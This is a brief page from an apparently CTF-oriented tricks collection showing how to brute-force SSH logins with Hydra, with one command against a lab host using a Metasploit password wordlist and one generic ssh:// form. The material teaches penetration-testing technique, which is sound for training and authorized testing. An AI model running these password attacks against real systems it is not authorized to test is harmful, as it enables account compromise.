> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-11/bruteforce/ssh/trick-0415.md).

# SSH Login Bruteforce

***

Perform a dictionary attack against an SSH service using Hydra. Specify the target username with `-l`, the password list with `-P`, the target host, and the service name (`ssh`).

```bash
hydra -l alice -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target.ine.local ssh
```

An alternative syntax specifies the target IP address and the SSH service using `ssh://`. The `-l` option specifies the target username to attack, and the `-P` option specifies the path to the password list file.

```bash
hydra -l username -P password_list.txt ssh://target_ip
```
